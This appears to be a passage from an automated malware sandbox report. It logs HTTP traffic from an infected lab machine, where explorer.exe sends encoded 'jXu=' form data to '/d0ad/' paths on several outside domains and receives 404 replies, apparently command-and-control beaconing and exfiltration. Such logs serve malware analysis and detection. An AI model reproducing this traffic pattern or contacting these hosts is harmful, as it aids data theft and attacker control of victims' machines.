30 76 79 5a 4d 7a 2d 66 64 6b 78 55 5a 75 43 61 55 6a 7a 7e 70 75 4d 35 32 68 4e 41 4c 47 46 28 76 55 2d 56 78 65 39 46 76 30 6b 59 67 6f 51 4e 7a 56 5f 7e 67 38 36 61 41 34 43 34 37 58 53 5a 49 7e 6e 71 48 66 42 38 34 71 78 4b 31 50 53 53 56 4c 63 35 4d 37 2d 41 6e 34 76 77 55 6f 4d 52 2d 6a 50 58 58 79 37 6a 54 6f 74 51 34 56 6e 70 37 48 4e 68 37 6e 77 6c 36 50 46 59 42 61 4e 38 78 4b 56 73 52 41 7a 4e 32 76 64 4e 42 55 46 4d 46 4f 39 53 7a 33 49 35 4e 31 77 63 59 69 47 4a 47 76 48 48 38 63 48 4a 45 50 75 68 48 46 31 62 53 46 30 75 32 64 79 68 71 38 32 35 37 61 44 6f 50 78 68 73 7a 64 77 67 2e 00 00 00 00 00 00 00 00 Data Ascii: jXu=binxmIkcuJsBpWC6BPh6W0dBF3IhFYo0PQ09Qsyy(5WEOqMxVRHDfn28SgnOOIZbwZLDhgTgwzHgT9SzoL5O67poX4vOQjQO1KpBr9wKu1n5j-T4z4py3ue9RlKftFk1VlOHM-M7zgFo77iDad4NYJzG~YY-qxKPKLPHBZUA1RyzlxMvXSD1NICsBDz03LNjYUXCKaIayCV6RIQf6mh8tHP7opmPd9pwMas1Cbl6t8CdOqV0xPCTVSINBHqSzBITwV4XoWersVXD1dWmTQ2rnTcyBGE-XdoBbrj72rs-Zi5lQOtMkL2YRb5I1k52xc40vyZMz-fdkxUZuCaUjz~puM52hNALGF(vU-Vxe9Fv0kYgoQNzV_~g86aA4C47XSZI~nqHfB84qxK1PSSVLc5M7-An4vwUoMR-jPXXy7jTotQ4Vnp7HNh7nwl6PFYBaN8xKVsRAzN2vdNBUFMFO9Sz3I5N1wcYiGJGvHH8cHJEPuhHF1bSF0u2dyhq8257aDoPxhszdwg.
Oct 26, 2022 13:20:14.333565950 CEST	1728	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 26 Oct 2022 11:20:14 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Content-Encoding: gzip Data Raw: 65 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 55 90 41 4f c3 30 0c 85 ef fd 15 66 67 98 07 da 31 8a 04 6b 27 26 95 31 a1 ec c0 31 2c 86 44 ca 92 91 b8 4c fd f7 24 1d 12 70 f4 f3 f7 ec 67 8b ab f6 79 a5 5e 77 1d 3c aa a7 1e 76 fb 87 7e b3 82 d9 0d e2 a6 53 6b c4 56 b5 97 ce dd 7c 81 d8 6d 67 b2 11 96 8f 5e 0a 4b da 94 82 1d 7b 92 cb c5 12 b6 91 61 1d 87 60 04 5e c4 46 e0 04 89 b7 68 c6 ea bb 95 7f 98 52 35 e2 24 95 25 48 f4 39 50 66 32 b0 7f e9 e1 ac 33 84 c2 bd 57 0e 62 00 b6 2e 43 a6 f4 45 69 2e f0 34 d9 ee 8d 71 ec 62 d0 de 8f d7 a0 e1 5f 80 86 52 8a 69 1a 44 e1 50 14 a6 54 86 9f ad f3 04 9c 46 17 3e 80 23 0c 99 40 07 e8 2a dc c6 c3 70 a4 c0 55 b7 3a 98 0a fe 26 fb 59 8b d3 21 25 7a 7d 40 f3 0d 59 3c e4 fe 3b 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: eeUAO0fg1k'&11,DL$pgy^w<v~SkV\|mg^K{a`^FhR5$%H9Pf23Wb.CEi.4qb_RiDPTF>#@*pU:&Y!%z}@Y<;0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
85	192.168.11.20	49929	103.20.200.97	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:20:16.439145088 CEST	1733	OUT	POST /d0ad/ HTTP/1.1 Host: www.bondiev.com Connection: close Content-Length: 51813 Cache-Control: no-cache Origin: http://www.bondiev.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.bondiev.com/d0ad/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 6a 58 75 3d 62 69 6e 78 6d 49 6b 63 75 4a 73 42 70 57 43 36 42 50 68 36 57 30 64 42 46 33 49 68 46 59 6f 30 50 51 30 39 51 73 79 79 28 35 65 45 4f 5a 45 78 55 32 62 44 63 6e 32 38 59 41 6e 65 4f 49 5a 61 77 5a 7a 48 68 67 75 58 77 32 4c 67 54 72 43 7a 72 39 74 4f 28 37 70 70 4c 6f 76 4d 42 54 51 38 31 4b 6c 72 72 39 6b 38 75 46 54 35 6b 35 76 34 6c 65 68 31 78 4f 65 37 52 6c 4b 74 67 6c 6b 39 56 6c 4c 61 4d 2d 49 37 7a 6a 78 6f 36 4a 61 44 63 4f 51 4e 66 5a 7a 5a 30 34 59 68 28 42 4c 6d 4b 49 79 77 42 5a 55 2d 31 51 32 7a 6c 32 51 76 57 52 72 36 4e 6f 43 73 66 7a 7a 33 7a 4c 41 6b 59 55 62 52 4b 61 73 61 79 43 39 36 65 49 51 66 7e 31 35 5f 35 33 50 39 69 4a 6d 69 4f 74 6b 39 4d 61 52 47 43 65 64 36 74 4d 47 64 50 62 56 30 7a 75 43 54 4a 69 49 50 46 48 71 37 70 78 49 66 77 56 70 38 6f 57 7e 56 73 56 7a 44 32 5f 65 6d 58 46 61 73 67 7a 63 4f 66 32 46 30 54 64 73 4e 62 72 79 67 32 72 73 49 5a 6e 5a 6c 51 65 64 4d 6c 4b 32 5a 42 62 35 4c 38 45 34 79 6b 73 30 49 76 79 56 55 7a 5f 6d 59 6b 79 34 5a 73 69 61 55 6d 51 57 75 6b 38 35 78 7e 39 41 5a 49 6c 28 38 55 2d 5a 4c 65 34 39 52 30 56 30 67 75 6b 70 7a 53 76 7e 68 36 61 61 45 79 69 34 68 54 53 5a 49 7e 6e 6d 35 66 42 67 34 28 54 4b 31 41 41 4b 56 41 72 74 4d 39 2d 41 6c 34 76 78 4d 6f 4d 64 37 6a 50 66 39 79 2d 72 35 6f 75 38 34 56 7a 4e 37 41 49 64 6b 6a 41 6c 31 65 31 59 4e 48 64 35 7a 4b 56 67 4a 41 33 73 44 76 76 4a 42 56 47 6b 46 64 74 53 77 38 49 35 4b 32 77 63 4f 7a 57 46 61 76 48 61 4a 63 47 74 55 50 75 5a 48 47 78 4f 34 65 46 47 50 4b 78 46 37 28 54 45 74 45 52 73 31 71 42 41 78 66 6b 55 73 6f 4d 57 6e 50 34 53 5f 56 53 77 4a 33 46 63 44 33 7a 65 33 4c 56 4c 66 30 68 63 68 4b 76 39 4e 58 58 33 59 37 4f 6c 73 38 6e 73 46 68 71 51 6f 72 5f 4e 6c 4b 65 47 57 43 70 4e 67 37 48 65 30 49 72 4d 73 38 56 37 6d 34 62 32 4b 64 6c 64 4d 56 32 68 30 6c 77 35 62 4c 30 51 6b 39 47 71 44 59 64 30 4d 78 61 59 72 6d 46 44 6c 72 53 55 77 69 5a 4e 49 7a 34 53 35 4b 30 28 51 30 57 69 67 51 57 79 64 56 36 30 33 65 70 6d 34 57 6c 28 72 67 68 37 57 37 65 6b 68 30 48 54 41 67 31 77 78 38 42 5a 34 4b 77 6d 72 46 4c 45 72 62 4b 4d 78 68 4b 44 67 41 66 75 45 48 61 64 6d 79 68 53 58 6d 61 77 6c 50 75 74 66 42 4e 30 71 6c 59 6d 2d 49 6b 76 73 70 7a 58 4b 41 45 55 41 74 67 4d 56 43 77 5a 62 32 6a 56 6e 68 56 30 6b 68 46 6b 51 78 52 57 51 55 6f 39 6e 58 6f 76 48 74 32 41 6b 58 33 36 79 50 34 41 50 76 6e 73 6e 32 35 5a 7a 64 67 4e 4f 4d 74 6f 6d 4f 43 4e 42 74 33 4a 79 48 4b 58 56 4c 35 7e 4f 7e 4f 76 49 6d 70 58 36 49 66 6c 32 53 5a 74 77 58 37 5a 71 47 4a 6f 6a 73 44 79 71 6c 74 58 74 34 7a 77 73 72 73 34 5f 47 74 58 4c 35 56 55 39 59 38 63 6b 63 4d 50 66 45 55 50 72 64 55 52 39 34 31 79 38 31 38 31 53 6a 66 4a 43 75 4b 73 4d 4d 73 33 4e 70 50 6a 64 54 56 6a 6a 32 6a 59 47 78 43 6f 6c 72 5f 31 61 56 4e 65 5f 46 73 46 61 73 57 5a 52 74 36 51 51 6e 62 62 59 30 4a 68 4b 63 64 6f 46 4c 41 6b 73 77 67 51 4a 6d 76 5a 62 73 47 65 76 46 44 57 51 51 39 75 62 63 61 73 67 77 6f 35 34 54 66 35 67 75 65 66 48 44 62 73 5f 56 5a 6b 38 6b 57 66 53 64 44 75 42 30 54 46 69 4e 63 58 33 7a 61 4d 38 37 70 52 72 4b 6c 51 33 33 31 61 57 4c 4c 4d 70 64 65 66 64 35 4c 44 77 43 4b 34 77 59 2d 71 4d 69 62 7e 31 67 55 48 6c 7a 45 44 77 77 6b 39 4b 4d 4f 68 32 37 77 66 38 6a 75 6e 35 6a 67 43 59 39 57 4a 74 4e 59 50 76 62 74 64 66 54 6c 4d 6c 51 6d 43 59 4c 52 6b 43 64 6b 67 71 50 5a 6c 41 30 34 4f 77 6a 4a 46 37 63 43 6a 48 59 44 34 38 48 62 28 4c 54 73 6d 73 4a 76 78 6a 6f 71 78 37 44 70 70 5a 76 58 62 2d 38 42 61 59 63 4c 28 56 52 6e 46 4e 68 6d 31 68 74 76 76 54 74 7a 4b 6d 6a 78 67 45 61 38 59 4a 34 6b 59 63 50 4f 69 4f 6d 51 56 5f 76 58 7a 6a 68 71 49 48 68 44 70 30 4e 79 76 54 38 77 58 46 43 47 51 32 67 5a 75 62 76 32 31 73 75 39 71 34 53 5f 34 4e 47 57 4d 5a 6a 73 7e 79 69 44 38 76 56 75 32 75 41 44 4b 47 79 4c 77 5f 56 6b 31 47 72 58 54 37 6c 63 59 38 58 72 72 62 55 75 42 74 56 31 72 65 79 72 4c 4b 66 78 79 51 59 6f 64 6a 63 49 67 4e 42 37 69 57 32 45 78 4d 58 30 53 62 36 7a 68 55 63 45 5a 59 4c 59 76 48 45 58 36 78 6b 64 4a 31 39 4f 77 39 6f 49 48 53 79 53 39 33 31 61 70 47 58 68 4c 79 53 68 44 38 65 72 41 Data Ascii: jXu=binxmIkcuJsBpWC6BPh6W0dBF3IhFYo0PQ09Qsyy(5eEOZExU2bDcn28YAneOIZawZzHhguXw2LgTrCzr9tO(7ppLovMBTQ81Klrr9k8uFT5k5v4leh1xOe7RlKtglk9VlLaM-I7zjxo6JaDcOQNfZzZ04Yh(BLmKIywBZU-1Q2zl2QvWRr6NoCsfzz3zLAkYUbRKasayC96eIQf~15_53P9iJmiOtk9MaRGCed6tMGdPbV0zuCTJiIPFHq7pxIfwVp8oW~VsVzD2_emXFasgzcOf2F0TdsNbryg2rsIZnZlQedMlK2ZBb5L8E4yks0IvyVUz_mYky4ZsiaUmQWuk85x~9AZIl(8U-ZLe49R0V0gukpzSv~h6aaEyi4hTSZI~nm5fBg4(TK1AAKVArtM9-Al4vxMoMd7jPf9y-r5ou84VzN7AIdkjAl1e1YNHd5zKVgJA3sDvvJBVGkFdtSw8I5K2wcOzWFavHaJcGtUPuZHGxO4eFGPKxF7(TEtERs1qBAxfkUsoMWnP4S_VSwJ3FcD3ze3LVLf0hchKv9NXX3Y7Ols8nsFhqQor_NlKeGWCpNg7He0IrMs8V7m4b2KdldMV2h0lw5bL0Qk9GqDYd0MxaYrmFDlrSUwiZNIz4S5K0(Q0WigQWydV603epm4Wl(rgh7W7ekh0HTAg1wx8BZ4KwmrFLErbKMxhKDgAfuEHadmyhSXmawlPutfBN0qlYm-IkvspzXKAEUAtgMVCwZb2jVnhV0khFkQxRWQUo9nXovHt2AkX36yP4APvnsn25ZzdgNOMtomOCNBt3JyHKXVL5~O~OvImpX6Ifl2SZtwX7ZqGJojsDyqltXt4zwsrs4_GtXL5VU9Y8ckcMPfEUPrdUR941y8181SjfJCuKsMMs3NpPjdTVjj2jYGxColr_1aVNe_FsFasWZRt6QQnbbY0JhKcdoFLAkswgQJmvZbsGevFDWQQ9ubcasgwo54Tf5guefHDbs_VZk8kWfSdDuB0TFiNcX3zaM87pRrKlQ331aWLLMpdefd5LDwCK4wY-qMib~1gUHlzEDwwk9KMOh27wf8jun5jgCY9WJtNYPvbtdfTlMlQmCYLRkCdkgqPZlA04OwjJF7cCjHYD48Hb(LTsmsJvxjoqx7DppZvXb-8BaYcL(VRnFNhm1htvvTtzKmjxgEa8YJ4kYcPOiOmQV_vXzjhqIHhDp0NyvT8wXFCGQ2gZubv21su9q4S_4NGWMZjs~yiD8vVu2uADKGyLw_Vk1GrXT7lcY8XrrbUuBtV1reyrLKfxyQYodjcIgNB7iW2ExMX0Sb6zhUcEZYLYvHEX6xkdJ19Ow9oIHSyS931apGXhLyShD8erAK6xnU5ZF4O7gVRww0Fk3BL_JI4zdT0meGN-PkqKG2Za9ZkUyxicvbDnaVADnYKtJ4dUG9iEJ0~ZRDbuKXXhOu21hdnPIF1GaDISVAmUXjESyUu2krX3zMJh1t5RbTt2ymdSF4PCudcDpeGCltO3rAOHqSM0CGNsxpaQeiAEHs5oyzL1MjJNzWnsbqsffYQJG0BC6IJ90yKXOH3BCfJx54n9NaXZHJBjnNqxUt1ZjlzQ6uetf_SyU3fJ8vu-xP4rsNBsgKk7ooXEg1uRyKjOPtNZa_VLgxG8vMuMxUkyDvlOjt(U~RgiEnm1mte5j27_CE4M3-KbDC5ZqWPZvPl4n_Civ4rFls3sAC7H35iapSVzE6nS4VfTltm3MHAo9O8mFUA1F5ynYcdI5ehJlFRAKQbU9PTMrOunKHEbKWVnQCM3OCW6HUbDgzX2xNgsEkJB6wIVjtp26cDFMjlxzGO1wsYRs0C-pPDtdlNn0hYmEKPrq6Y1Hb2q~HorOW5bVaEg6Qk-fEvB1InQqcUC6LgALrQzSVr1a_KFkWfwhO(SUkb09svxudq9UQ1POkr6gYD7(-COsB4XLYUCDeXZBCK9FpNpRBxMVWYzWEaB~Dzl4yJS8XoAqw83Sw9DArcE6BVf9piKnJGSRMEm3osPaaHu~ApT2QulRs5Y6e1zYxGXEtpqH6K185ED7Bqmvs9QbbK2r4lJ0msVATv6PtxMMXWWlPjmjqcuyyv9If~_ZEfw(toNcCJS84yGrpbo0To7VAW3s6D28cjR7SmT(-8FlzsCIoYyVz4uem5NYpre9_Ky(g(E1OoivtB2bfuJ9c11MwHP0IQZFPo8CAJUg_SGOLusjDoTxW2GdiRwTGGaunvt6t(zajhyvf9lyQPhu3(wRhusV6m9LsYCz1ij(Jz6InMDolkQH6hKWOhL6qlAqrEJ1ifhXUNpPDvfPbO7Ni0QI4IE0AvSEtO81vzieZ1KmtkqDzDAaFSQCPQaM6QmvyhX10XiiIj7~fng8aDbXa3s7gIT4ak8iXLEUCfQOiMP3g7SwpYIg8NtCtqjB-t1dcv-lCJGr3ht~ke3F6WRXC5jw6b91ga0xGf12CwofzcPo67XV1cKFs7ZSbcx6UlaIXdzBEmPn-HQjqVTIORcVLljnqcnX-bmlXKBqLiVorS7AdlgxvO9SaDR9VVGaUUo3I7GwKd2~HVNvp2us36V8V5HhHnD5Gl7Qih09yJzFEjcn5IxfA0Mh-l4jdQqbwrSz0USWAOQ71(sr-MOyKqFaD8ettHGfX~Q1cq4JkIreEs00nVSSsfW86Vip75Sz3D-5sfH2wbgNvgn2Fp72qn0saAMtnXt6_a7n7pSx2gZW-XpHiDXCA5lhUEbFnTFKUMwg2Gpr4ZKDXC06tbTBgzbFvvM1tJwMrnRKDPvpeFUcJnMZWyw8b~rMtYCH4iYUZzs0NnJiG4FpfO2e7cfPo(4rYC3j743Sr~3vx6unGRXx6KkwI8-1rD7hRyeMU2_KV46lHgwm5votLe3H_lRfMTopYo1xKgo65RqUo6px1KBHANpM1Nxf_eHHRFhKFVaeQiU6YGozsRtiATJ9IP897Css7uOp9U5VC7vcwoEuZZnSPlWglYx9DsVG0VgcnXMWa97bItLZMvCQ6TEHFo3K5vPVB0lTtzY7uXNujeBt8AIMCg4jlg8j7sKyNrrEoKz7oL4ont_CHbehi1hjhjM0FRoHOvTXFfz6UmPtgdLW1inxYfI~6qYMZ2YVDltetCXCTBFzy7TXmVwXoJoo8IdTZOsqUxUiRgZ9etBiSAT9GZ8rfCsIHP8OVeb2EIUTDe7ChyhukGwEKI2Dpq3HHVySvhN1Z5rXhBhhIaxSoLMeAElTGd8CWSWdN0eXSd1roSsr51qvaC7j-iA6wF7qHQjwiqgIS0stequUs3ugEKBGFrUkecztHi5ATgTZB0khkXyUU(e9rs3dUea5jii59Z77JUJFcNu33HGWuM9oiknSTD77rPjIDRu8mZBNSV6UNl-~W98EmTgMi4R0iWnR3hhnNrdJacFcZSRiBTvqUnP7Pz_eLJJZOmBS31QDLv86w0xYSGCf98BVHKcET6zk0Hwu8MbY_4cA3G2uL~akI41ERTzi6RrXt3156bUo6mlfL6aIveat7ssLx1jZin1GNL777ND3c5wDdIIajl8ieucmD2VJpgnFkhtEoXEWBAaqsfx8b30IyDOEafBJRHLo4ulX17DXs16f0Sc0m0IYBDnL4WyIXYFBN5tqpOyRr9iO00E~AKeVEdwYFBRPQ26S28fqTtCGvxlYVfTMSLS7Oz7Sx9tolBIhxSR2m6LfrH0sXnIUeTYNEuMhnEjwuwTktHFQybAhHPAh2EERXgujwcPxVnibYrA2O~vomNC4xeZpeMcT0LCwTmvLTibe3~8DS~N4YT5RN0zX_hUaauGmL4Soc73XKUIVT4aBX00JYL9BawEyVl75_DJLhPtQ1Oq7NYvP4lNhAMondo5iK502u624tWb7w1vBIwd2KkqT_QkPwwF1ZuqVJp-KD8LJBfCmh3w6XraC1DE7wEUIWWGEMpqu-kLngfNCPsJuNciKikaQha0IxoW8vB_X7QW(ciJHBtgR4Rsbdi3OvjH511fbJHdfX1j28MrewMYviy9QHQZ8iUaFhvEuBdcH2rzuwiZ8fN6y9oVEHW_yam54_VtbOBazzYo85QyMeIF(3gYittQps~pftzT
Oct 26, 2022 13:20:16.439241886 CEST	1741	OUT	Data Raw: 79 66 4f 6a 4d 54 63 63 74 41 4b 34 78 6c 76 6a 65 33 45 28 67 72 36 72 51 53 52 48 56 70 43 70 6a 6b 33 70 4d 79 57 65 74 7e 55 34 2d 33 49 36 46 73 36 7e 77 49 58 41 58 76 4f 52 4f 37 50 70 77 37 7a 7a 35 72 64 66 4b 4f 73 6d 77 44 41 55 33 4e Data Ascii: yfOjMTcctAK4xlvje3E(gr6rQSRHVpCpjk3pMyWet~U4-3I6Fs6~wIXAXvORO7Ppw7zz5rdfKOsmwDAU3NDzdxNYCHdk0RZk0w93V7vcJ0qa7gGMuQgHx19f2aRwq1ysNTcQWcLOmXWZWdbm12yfAUJi4inds01NwL9UnetmYdhLerJNO~uExQnDdZEUbOAXt4hOQL4OgezbB9Dh0xpnUGlRjR-ogpitVVPgHS-ZlUUsRIfLP7N
Oct 26, 2022 13:20:16.789556980 CEST	1744	OUT	Data Raw: 59 49 4b 42 4f 59 2d 34 33 51 68 75 6a 52 63 49 6f 69 73 5a 41 53 4d 64 4a 4f 65 47 53 6f 77 6a 53 74 48 6b 6b 67 46 6c 73 37 5f 49 68 41 35 4f 72 75 2d 71 73 37 51 41 66 62 59 4b 57 38 6a 77 35 73 6a 65 76 77 35 42 68 6f 44 38 53 33 46 54 38 56 Data Ascii: YIKBOY-43QhujRcIoisZASMdJOeGSowjStHkkgFls7_IhA5Oru-qs7QAfbYKW8jw5sjevw5BhoD8S3FT8VHOxhNpMPNLsPYjVXalQTI2z0A720EVxMVg8vUfQcn7ltXH_4vaO1Napw0~_VRIrL6h3spCCjutVOd3BqRPBErb3HlMnkhPor1k9~fqo1ngquEg0X9b71IB8lUHEA7zfsPkH8zPPA-ggBzFKPc5vPpwPBifS4z9-za
Oct 26, 2022 13:20:16.789729118 CEST	1761	OUT	Data Raw: 36 4e 6c 67 46 37 75 56 34 33 62 4b 7a 37 46 6e 62 56 43 63 44 68 51 47 42 6b 4b 6c 47 36 37 4a 46 28 6a 48 4d 43 65 67 70 38 77 76 44 28 4d 7a 70 76 34 50 58 76 45 28 6a 61 34 79 32 4d 55 6a 48 4d 70 61 6d 45 38 38 4f 50 4c 66 4c 50 43 78 65 64 Data Ascii: 6NlgF7uV43bKz7FnbVCcDhQGBkKlG67JF(jHMCegp8wvD(Mzpv4PXvE(ja4y2MUjHMpamE88OPLfLPCxedV0WDJamYfNoWjLRqPanPaWqMSoBr8inOWfJh-GtpuEhJ964RK1OZhbhDW7m~h7mJDvnTn4yR5SC~TUoglnvCkB6O76rEfGCNUJJ1Fq1ElBtj-cUr6eaoQAhIpnAVuIkXhpdU-sBRlOYULEQqwri6s8UB7o0fDnCtN
Oct 26, 2022 13:20:16.789896965 CEST	1764	OUT	Data Raw: 46 44 54 36 59 41 61 48 66 4b 44 30 47 4b 51 7e 76 52 44 34 50 4f 4d 44 32 79 30 65 49 76 74 67 66 48 30 37 76 59 33 61 53 4f 46 4d 73 57 73 6f 44 4d 72 34 55 63 2d 6e 56 4d 6e 4e 69 67 49 72 2d 67 57 49 54 42 67 46 41 54 78 56 72 6b 63 36 72 7a Data Ascii: FDT6YAaHfKD0GKQ~vRD4POMD2y0eIvtgfH07vY3aSOFMsWsoDMr4Uc-nVMnNigIr-gWITBgFATxVrkc6rzTFdeMbs(hD8xHnXX6cbB9B1gllK74leazxoRpb1Umi1tyiqxmy4JnXCcz4cA-l-MpXUEmx6VkjzK0MzCAUDmFJ5tDefFVMuasXLp0~k7igpOdcuX-w03-NP2zP5s6EbNekx7vqiSkj3tOV1B9tFYyqmQstV2IPKgF
Oct 26, 2022 13:20:16.790060043 CEST	1766	OUT	Data Raw: 34 4a 54 44 78 36 38 57 34 4b 6a 46 49 59 69 58 68 69 73 51 67 6b 51 78 35 67 58 46 63 35 57 51 76 62 5f 4c 35 62 65 42 4a 62 74 6b 49 50 55 6d 57 42 56 37 74 30 52 64 63 76 54 7e 6f 63 6e 4e 42 6c 2d 64 75 4b 74 45 67 55 6d 5a 58 42 30 79 6e 66 Data Ascii: 4JTDx68W4KjFIYiXhisQgkQx5gXFc5WQvb_L5beBJbtkIPUmWBV7t0RdcvT~ocnNBl-duKtEgUmZXB0ynfTjvqwjZ3sKDg2YJUY~Afsct8OjYy2kumtJsP33ZZXjUOqfvznc8HqQ3XeYqENLVxxTqGt5sLBp3pioxfVMRIf2qf60Z~7gydTaNDqzBtPh3nqRCyKDk5moFTOhCQzf619WqWakKIDtB1A9nRuL9N0cjpYIJV0i52Y
Oct 26, 2022 13:20:17.140885115 CEST	1774	OUT	Data Raw: 44 5a 69 73 4c 70 35 34 44 48 6d 42 36 5a 4d 4a 4f 46 64 74 71 4d 51 6a 6f 73 53 4c 6b 38 53 6f 50 31 58 68 57 35 4e 62 46 4f 52 77 4f 54 61 43 75 4e 41 53 5f 56 72 30 61 51 65 55 5f 6a 69 5a 36 53 6e 5a 48 6b 4b 77 41 6f 31 74 58 43 35 47 49 67 Data Ascii: DZisLp54DHmB6ZMJOFdtqMQjosSLk8SoP1XhW5NbFORwOTaCuNAS_Vr0aQeU_jiZ6SnZHkKwAo1tXC5GIgFIW6dufrxUZNMjU3toWllg72kgn7cO8KFwGjWDBUo8MszmVZHj-cjzJSwDZzkZ55HUbBGPiRIsniCZMm_jTAKl7AUEUoFI-rXOZYlh7Vyz1i2aiRAVGihCKau~JNQ~IEtl9FNanr3oDQkaaH3FKbDy4E5Tf~5Moj2
Oct 26, 2022 13:20:17.140991926 CEST	1780	OUT	Data Raw: 65 6c 45 51 5f 57 4e 54 44 33 79 4c 50 69 4c 6d 71 7a 45 32 51 62 38 75 38 67 69 6d 6f 30 46 37 75 76 56 57 31 64 5a 6b 65 4e 69 45 5a 71 49 51 5a 4d 39 73 49 4c 51 73 65 77 6a 74 6e 54 57 70 4d 61 64 79 55 44 72 4c 43 43 4b 38 6d 36 6d 5a 74 30 Data Ascii: elEQ_WNTD3yLPiLmqzE2Qb8u8gimo0F7uvVW1dZkeNiEZqIQZM9sILQsewjtnTWpMadyUDrLCCK8m6mZt0PciYQKnB5Y2eaIJAbzUtXe0DotdmIeryN10Nbxd52DywlIWk3S_5vka~7~XRtwHk3hu60Ufr83ZoB~aNXUrl6JYr5naqqYH9bYdcY~NgL7V~GvBUBpPLU1Y1jTr0I4geWCL2n1IUTsuERhaECPXFxvcE5cuUjfVEC
Oct 26, 2022 13:20:17.510807037 CEST	1781	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 26 Oct 2022 11:20:17 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Content-Encoding: gzip Data Raw: 65 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 55 90 41 4f c3 30 0c 85 ef fd 15 66 67 98 07 da 31 8a 04 6b 27 26 95 31 a1 ec c0 31 2c 86 44 ca 92 91 b8 4c fd f7 24 1d 12 70 f4 f3 f7 ec 67 8b ab f6 79 a5 5e 77 1d 3c aa a7 1e 76 fb 87 7e b3 82 d9 0d e2 a6 53 6b c4 56 b5 97 ce dd 7c 81 d8 6d 67 b2 11 96 8f 5e 0a 4b da 94 82 1d 7b 92 cb c5 12 b6 91 61 1d 87 60 04 5e c4 46 e0 04 89 b7 68 c6 ea bb 95 7f 98 52 35 e2 24 95 25 48 f4 39 50 66 32 b0 7f e9 e1 ac 33 84 c2 bd 57 0e 62 00 b6 2e 43 a6 f4 45 69 2e f0 34 d9 ee 8d 71 ec 62 d0 de 8f d7 a0 e1 5f 80 86 52 8a 69 1a 44 e1 50 14 a6 54 86 9f ad f3 04 9c 46 17 3e 80 23 0c 99 40 07 e8 2a dc c6 c3 70 a4 c0 55 b7 3a 98 0a fe 26 fb 59 8b d3 21 25 7a 7d 40 f3 0d 59 3c e4 fe 3b 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: eeUAO0fg1k'&11,DL$pgy^w<v~SkV\|mg^K{a`^FhR5$%H9Pf23Wb.CEi.4qb_RiDPTF>#@*pU:&Y!%z}@Y<;0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
86	192.168.11.20	49930	103.20.200.97	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:20:18.730043888 CEST	1781	OUT	GET /d0ad/?-ZeDxH=1bfDxheXLTWtxB0&jXu=WgPRl/FvoZMBo2mlKPlxV15+dFE2DaQPOh4rMMuZqba7P4QkcwKBZ2znWxmeG8Vu0cfzpyTmzFPFRI6Qoo1H9rMyaIuGGCESsA== HTTP/1.1 Host: www.bondiev.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 26, 2022 13:20:19.002845049 CEST	1782	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 26 Oct 2022 11:20:18 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 315 Connection: close Vary: Accept-Encoding Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
87	192.168.11.20	49931	51.91.236.193	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:20:24.028343916 CEST	1783	OUT	POST /d0ad/ HTTP/1.1 Host: www.rahaingoadvice.com Connection: close Content-Length: 185 Cache-Control: no-cache Origin: http://www.rahaingoadvice.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.rahaingoadvice.com/d0ad/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 6a 58 75 3d 72 35 47 54 43 51 39 54 76 68 6f 74 45 39 41 68 4b 45 39 6d 56 34 58 77 6b 36 43 4d 75 47 45 65 79 64 64 69 65 2d 53 6a 78 35 31 50 41 66 51 4e 6e 74 71 76 44 74 71 5f 72 67 64 4f 30 